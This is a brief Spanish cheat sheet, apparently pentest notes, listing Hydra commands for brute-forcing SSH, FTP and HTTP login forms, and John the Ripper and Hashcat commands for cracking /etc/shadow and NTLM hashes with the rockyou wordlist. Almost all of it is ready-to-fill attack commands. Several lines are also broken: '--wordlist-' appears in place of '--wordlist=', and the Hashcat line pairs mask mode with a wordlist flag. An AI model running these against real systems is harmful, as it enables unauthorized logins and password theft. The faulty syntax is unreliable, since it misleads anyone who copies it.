Fuerza Bruta

Hydra

Sintaxis para realizar fuerza bruta utilizando una lista de usuarios y una lista de contraseñas.

hydra -L <LIST OF USERNAMES> -P <LIST OF PASSWORDS> <TARGET> <SERVICE> -s <PORT>

Sintaxis para realizar fuerza bruta con un nombre de usuario y una lista de contraseñas.

hydra -l <USERNAME> -P <LIST OF PASSWORDS> <TARGET> <SERVICE> -s <PORT>

Fuerza bruta al protocolo SSH

hydra -L users.txt -P passwords.txt 192.168.1.10 ssh
hydra -L users.txt -P passwords.txt ssh://192.168.1.10

Fuerza bruta al protocolo FTP

hydra -l admin -P passwords.txt 192.168.1.10 ftp
hydra -l admin -P passwords.txt ftp://192.168.1.10

Fuerza bruta al protocolo HTTP

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.10 http-post-form "/login/:user=^USER^&pass=^PASS^:Invalid password"

John The Ripper (john)

Sintaxis:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

/etc/shadow

unshadow passwd shadow > hash # Primero, preparamos un archivo para que John lo descifre
john --wordlist-/usr/share/wordlists/rockyou.txt hash # Crack the passwords

NTLM hashes

john --format=NT --wordlist-/usr/share/wordlists/rockyou.txt hashes.txt

Hashcat

hashcat -a3 -m 1000 hashes.txt --wordlist-/usr/share/wordlists/rockyou.txt

• -m tipo de hash (1000 - NTLM)